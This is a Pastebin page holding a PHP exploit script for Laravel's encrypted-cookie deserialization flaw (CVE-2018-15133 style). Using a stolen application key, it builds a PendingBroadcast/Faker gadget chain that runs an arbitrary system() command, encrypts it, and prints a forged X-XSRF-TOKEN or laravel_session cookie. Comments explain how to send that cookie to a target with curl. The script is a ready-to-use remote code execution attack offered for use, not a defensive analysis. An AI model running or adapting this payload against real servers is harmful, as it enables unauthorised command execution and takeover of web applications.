Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env php
- <?php
- $API_key = "dBL.....j0="; //edit here to API Key of laravel
- $cmd = "ls -la"; // edit here to your command here !!
- $cmd_len = strlen($cmd);
- $payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:15:"Faker\Generator":1:{s:13:"' . "\x00" . '*' . "\x00" . 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . $cmd_len . ':"' . $cmd . '";}';
- $value = base64_encode($payload_decoded);
- $cipher = 'AES-256-CBC';
- $iv = random_bytes(openssl_cipher_iv_length($cipher));
- $value = openssl_encrypt(base64_decode($value), $cipher, base64_decode($API_key), 0, $iv);
- if ($value === false) {
- exit("Could not encrypt the data.");
- }
- $iv = base64_encode($iv);
- $mac = hash_hmac('sha256', $iv.$value, base64_decode($API_key));
- $json = json_encode(compact('iv', 'value', 'mac'));
- if (json_last_error() !== JSON_ERROR_NONE) {
- echo "Could not json encode data." ;
- exit();
- }
- $encodedPayload = urlencode(base64_encode($json));
- echo "[+] Cookie: X-XSRF-TOKEN=" . $encodedPayload;
- // or
- //echo "[+] Cookie: laravel_session=" . $encodedPayload;
- // when you got Cookie let's exploit vuln
- // use curl command
- //curl -H "Cookie: laravel_session=eyJpdiI6Ill....TgxYyJ9;" http://<domain or IP>/
- // laravel vuln
- // here how to encrypt and decrypt with API_Key https://github.com/laravel/framework/blob/6.x/src/Illuminate/Encryption/Encrypter.php
- // when enc or dec it's serialize and unserialize
- // so we can exploit php object injection to create file or get RCE
- // please check some Ref:
- // https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-rce/
- // https://github.com/kozmic/laravel-poc-CVE-2018-15133
Add Comment
Please, Sign In to add comment
